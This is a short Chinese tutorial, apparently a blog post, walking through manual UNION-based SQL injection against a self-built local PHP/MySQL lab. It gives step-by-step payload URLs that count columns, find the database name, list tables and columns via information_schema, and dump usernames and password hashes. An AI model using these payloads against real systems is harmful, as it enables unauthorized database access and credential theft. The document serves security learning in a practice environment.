环境自己搭的
union联合,合并,将多条查询语句结果合并成一个结果,union注入攻击是手工测试
1.首先要判断是否存在注入点
2.通过order by 1~99 查询字段
首先应该用查询出字段
1. http://127.0.0.1/web/sql/union.php?id=1%20order%20by%201 (注:%20表示空格,)
我这里从1试到了7
到7的时候报错,也就会是说有6个字段
2. http://127.0.0.1/web/sql/union.php?id=1%20union%20select%201,2,3,4,5,6
我的回显是2和4,也就是说2和4有搞头
接下来,就是爆数据库名
3. http://127.0.0.1/web/sql/union.php?id=1%20union%20select%201,database(),3,database(),5,6
回显是两个test
也就是说是test就是数据库的名字
接下来爆表名
只用第四个数据库了,因为名字一样
4. http://127.0.0.1/web/sql/union.php?id=1%20union%20select%201,2,3,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27test%27),5,6
就是当表名是test的时候,查询表名。
我的回显是person,users,xss
所以继续查询users
继续在表中爆字段
5. http://127.0.0.1/web/sql/union.php?id=1%20union%20select%201,2,3,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27test%27%20and%20table_name=%27users%27),5,6
爆出字段 id,username,password,address,email,ip
开始查询数据
6. http://127.0.0.1/web/sql/union.php?id=1%20union%20select%201,2,3,(select%20group_concat(username,password)%20from%20users),5,60
得出:zhangsanahangsandemima,lisilisidemima,test098f6bcd4621d373cade4e832627b4f6
成功
得到账户密码
SQL注入中的union注入
最新推荐文章于 2023-07-11 16:00:52 发布